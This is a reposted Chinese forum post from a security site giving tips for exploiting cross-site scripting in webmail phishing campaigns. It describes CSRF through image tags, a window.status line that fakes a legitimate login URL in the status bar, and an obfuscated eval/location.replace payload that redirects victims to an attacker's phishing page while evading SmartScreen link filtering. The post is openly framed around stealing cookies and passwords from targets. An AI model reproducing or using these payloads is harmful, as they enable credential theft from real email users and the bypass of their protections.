XSS两三事(第一季) By:sH

admin 2021年4月3日19:35:56评论67 views字数 1604阅读5分20秒阅读模式

XSS两三事(第一季)

Author:ShadowHider
Email:[email protected]

这几天发现论坛里讨论XSS的帖子多了起来,刚好我以前也折腾过一阵子XSS,就斗胆来和大家交流分享下。

下面分享几个不算tipstips,应该很多大牛在利用XSS时都注意到了,但我还是再写一下吧,帮大家做个备忘。 XSS两三事(第一季) By:sH

#1 使用img标签进行CSRF

之前瞌睡龙兄弟在http://www.t00ls.net/thread-19431-1-2.html帖子中提到了需要利用CSRF来实现强制用户退出,在原贴中是这样写的:

其实不用这么麻烦,直接用下面的类似代码就可以实现一样的效果

img标签使用src属性时会触发一个GET请求,我们刚好可以利用它来实现CSRF攻击。

当前浏览器中保存了用户的session的话,用户访问包含以上代码的页面就会自动退出,达到了我们的目的。

#2 钓鱼时浏览器状态栏的问题

很多人在渗透中都热衷于先搞下目标的邮箱,各种XSS MAIL发的飞起,有偷cookies的,有钓密码的。

就拿钓密码的例子来讲,在执行payload时,有没有发现浏览器的状态栏那里略显尴尬?

呵呵,在你那段payload中加一句类似

window.status='https://login.163.com/ppsecure/post.srf?wa=wsignin1.0...';

这样的代码吧,会让整个钓鱼场景看起来会更和谐的(链接后面的...是精髓,lol)。

效果图:

#3 某MAIL XSS利用的一点细节

既然谈到了XSS MAIL的事,就多聊点,也是我以前遇到过的。

常搞渗透的各位牛应该知道某邮箱的cookie拿来是用不了的,所以该邮箱XSS的利用方式一般都是跳到自己的页面钓密码(当然也有直接利用ajax读邮件的),但是直接在payload中写自己钓鱼用的链接,然后发出去,到了目标的收件箱里,点开邮件后是这样的,不会执行我们的payload。

不过在目标邮箱里把自己的发信箱添加成联系人之后再发就不会出现这种情况了,当然这不现实。。。

原因是SmartScreen这货会检查邮件中所附带的链接,应该是靠一种白名单机制检测,不匹配就拦。

详细的看这里吧http://www.microsoft.com/mscorp/safety/technologies/senderid/overview.mspx

貌似就是这个东西在作怪。

当然,既然这里都能执行JS了,绕过这个检测机制也就不是什么难事了,把链接混淆下就行,像下面这样:

eval(window.location.replace('hfuckttfuckp:fuck/fuck/1fuck11.111.fuck111.11/sn123w.snt1fuck23.mafuckil.fucklivefuck.cfuckom/hofucktmailfuck.htm'.replace(/fuck/g,'')))

修改好payload之后再测试,发现不会被SmartScreen拦了,打开邮件直接跳转,bingo!

就先写这么多吧,我是想到哪写到哪,不走大脑的,没什么逻辑,文中有什么疏漏也请各位看官轻踩,欢迎批评指正。这里只是抛砖引玉,欢迎各路神仙在下面一起交流分享。

最后送给大家个小工具,是Fiddler的插件,不是什么神器,不是什么大杀器,使用简单,具体的自己用用看吧。

xss测试插件

http://115.com/file/bhkc5yx2

有机会再来写第二季...

Bye~

文章来源于lcx.cc:XSS两三事(第一季) By:sH

相关推荐: 构建完善的敏感操作验证流程

构建完善的敏感操作验证流程 凤凰 (凤凰涅磐,浴火重生) | 2012-11-05 16:22 1、定义敏感操作 需要具体到特定的功能上,如修改密码,修改安全邮箱。 2、将敏感操作进行等级划分 确定一个标准,对敏感操作进行重要性划分。 如可以通过安全邮箱修改账…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:35:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS两三事(第一季) By:sHhttps://cn-sec.com/archives/323783.html

发表评论

匿名网友 填写信息